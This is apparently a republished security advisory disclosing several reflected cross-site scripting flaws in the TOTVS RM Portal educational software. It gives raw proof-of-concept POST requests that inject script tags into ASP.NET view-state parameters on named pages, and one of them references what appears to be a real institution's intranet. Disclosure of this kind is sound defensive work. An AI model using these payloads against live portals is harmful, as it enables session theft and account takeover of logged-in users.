TOTVS RM PORTAL Cross Site Scripting

2016.02.16
Credit: vesp3r
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

TOTVS RM PORTAL (Educational) - Multiple Cross Site Scripting Vulnerabilities Product web page: www.totvs.com.br Author: vesp3r Email: vesp3r7c3@gmail.com Published: 13/02/2016 [Vendor Product Description] TOTVS (pronounced Totus) is a Brazilian software company, with headquarters in Sao Paulo. TOTVS was initially formed from the merger of Microsiga and Logocenter companies. It is the largest software company in Latin America. TOTVS is the leader in the Brazilian ERP market and according to the FGV, besides Brazil, with offices in Argentina, Mexico and the United States. [Advisory Timeline] 1- 22/Dec/2015 (No vendor response) 2- 05/Feb/2016 (No vendor response) Tested on: 11.40.80.x 11.52.50.x 11.52.63.x 11.52.64.x 11.82.41.1 11.82.37.0 11.82.41.112 11.82.42.1 12.1.6.108 12.1.6.117 12.1.7.100 12.1.7.110 12.1.7.120 12.1.8.0 12.1.8.1 [Vulnerability Details] Attacker could take advantage of reflective XSS by using unprotected __VIEWSTATE and __EVENTVALIDATION parameters, passed to various scripts. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary javascript code in browser in context of the vulnerable website. 1) Reflected Cross-site Scripting - Login.aspx Parameter: __VIEWSTATE POST /corpore.net/Login.aspx HTTP/1.1 [Snip...] Content-Length:599 Expect:100-continue Connection:Keep-Alive __VIEWSTATEGENERATOR=67BA4204&__EVENTARGUMENT=&txtPass=&__VIEWSTATE=%2fwEPDwULLTE4NzE2MDUyNDEPZBYCAgUPZBYCAgMPZBYKAgQPFgIeDUVudGVyRGlzYWJsZWQFBUZhbHNlZAIIDxYCHwAFBUZhbHNlZAIMDxBkDxYBZhYBEAUJQ29ycG9yZVJNBQlDb3Jwb3JlUk1nFgFmZAIQDw9kFgIeD0Rpc2FibGVPblN1Ym1pdAUFZmFsc2VkAhIPD2QWAh4Hb25jbGljawURRm9yZ290UGFzc3dvcmQoKTtkZOnQ03VTJ%2f9xMgjAXrV8uog9rRH%2flHTcm8QGAjB9nwz8a0d92<script>alert(1)<%2fscript>cd412&ddlAlias=CorporeRM&txtUser=&btnLogin=btnLogin%3dAcessar&__EVENTTARGET=&__EVENTVALIDATION=%2fwEdAAVhABOpj5tofEWFrJaBMLLmDFTzKcXJqLg%2bOeJ6QAEa2kPTPkdPWl%2b8YN2NtDCtxie46B0WtOk572tmQWZGjlgiop4oRunf14dz 2) Reflected Cross-site Scripting - EduPSCadastroCandidato.aspx Parameter: __VIEWSTATE POST /Corpore.Net/Source/EduPS-ProcessoSeletivo/Public/EduPSCadastroCandidato.aspx HTTP/1.1 [Snip...] Content-Length:294 Expect:100-continue Connection:Keep-Alive __LASTFOCUS=&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=26e09<script>alert(1)<%2fscript>6675c&__VIEWSTATEGENERATOR=2A268E6E&__EVENTVALIDATION=%2FwEdAGthFF%2FXOtK6iDwfhX1K6Jqoyk0VTIKR5mmZ%2BtIHMzMSvhs0Jc5vMLgh%2BScncp5A4h37bPOfETC9GIxfmAuz0Irc0oWQaruiZXPsPoJusmqmY3neRyPHmUYXvOoYPCF%2BNI6bJS0pQ 3) Reflected Cross-site Scripting - calendar.aspx - _ Parameter: __VIEWSTATE POST /Corpore.Net/SharedServices/LibPages/Calendar.aspx HTTP/1.1 [Snip..] Content-Type:application/x-www-form-urlencoded Content-Length:370 Expect:100-continue __VIEWSTATEGENERATOR=CBEC090A&__EVENTARGUMENT=&__VIEWSTATE=%2fwEPDwUKMTY1OTMzMTQ5MmRk0Sm9YhG2VrmP7sr3Vdu25PXWEY00sTB9uOI0E2J%2bDto%3d8f844<script>alert(1)<%2fscript>f1c95&ddYear=1940&ddMonth=1&__LASTFOCUS=&__EVENTTARGET=&__EVENTVALIDATION=%2fwEdANEBWDAi1sF9XTMpt%2bPoIvbLLrtqFwodORsBP5MdtMp97Worg0EVYGtniwWRlldVBtgv0s7aRHloaIopjAs%2b7nenbhd3yRDnFv26m%2by5T5c3Rd7F9O8yK3w 6) Reflected Cross-site Scripting - TstMain.aspx Parameter: __VIEWSTATE POST /Corpore.Net/Source/Tst-Avaliacao/RM.Tst.Provas/Public/TstMain.aspx HTTP/1.1 Referer:http://intra.ubm.br/Corpore.Net/Source/Tst-Avaliacao/RM.Tst.Provas/Public/TstMain.aspx [Snip..] Content-Length:589 Expect:100-continue Connection:Keep-Alive __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=blFubtHIte6TnItfljNkVuCPdpxrn2d21QVLovI1Oj6c1BjTFGCeNA%2bNH1hljOzffBO%2bE1VjGIfJORklj03DwzHH9gnfklyMHTfrSc6jXT0lmgWQ%2fn09OLOLHFy22L%2f09cQ2cnhIJ8zjXTNBkJOTrizTSX8roB4A2%2f5F0nw%2bHMedUzRwjzgcvas%2bVdOqpdrMgp%2bqwioI9MguZtfxVD7ONhnPDwo%2bUgLB2QraeHh4Fd7DAFy2BsVsCl7an3DaKlx0pMIwi%2f2g%2f8y%2f5VXL1WbXYw%3d%3d63eb9<script>alert(1)<%2fscript>35554&__VIEWSTATEGENERATOR=D041C7D7&__VIEWSTATEENCRYPTED=&__EVENTVALIDATION=oIbBDabE%2FPH2SjDjDsk1A4dri3DAV4qax04lAj1I%2B3JimDK%2Bq%2Bl4qrek8MK8H861dVvJHSx56%2BNa5v49Ol5ulZsG3D1QPnf2XgNT1yp2LaTarGQOsUfw60t 5) Reflected Cross Site Scripting - RecoverPassConfirmation.aspx __EVENTVALIDATION Parameter POST /Corpore.Net/SharedServices/LibPages/RecoverPassConfirmation.aspx?UserCaption=5LK%5c9F%5c3D%5c023%5c5B&ConfirmationCaption=%5c7B%5cFAbP%5c06%5c11Q%5c7C&RecoverContainerClassName=ASP.login_aspx%2c+App_Web_jfz24ryx%2c+Version%3d0.0.0.0%2c+Culture%3dneutral%2c+PublicKeyToken%3dnull&RecoverInitializeMethodName=GetRecoverPassServer&ServiceAlias=CorporeRM HTTP/1.1 [Snip..] Content-Type: application/x-www-form-urlencoded Content-Length: 458 __EVENTTARGET=btConcluir&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwULLTE2NDcyMzE4MDYPZBYCAgMPZBYEAgQPDxYCHgRUZXh0BQhVc3XDoXJpb2RkAgoPDxYCHwAFBUVtYWlsZGRkb5MeS264FOK9nmP0a1CNQffkay3Ey3ZEBuou6pi65D8%3D&__VIEWSTATEGENERATOR=AF2B313E&__EVENTVALIDATION=%2fwEdAAQGOgL7oK09LZ8PS37yV0yhEtmPWx9iivvmRAEsPWDH1L%2bBuAd%2fYR2jHO%2bKtDPe6m0Cy01bBAlsk2p17oJudhiaquajs%2bXic334N3XfjA0JtMaIEGbBaz%2fyyDVIoKpthJc%3dd8504<script>alert(1)<%2fscript>a2460&TextBoxUser=a%40a.com&TextBoxConfirmation=a%40a.com Thanks to: Ewerson Guimares (Crash) and Rodrigo Favarini


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top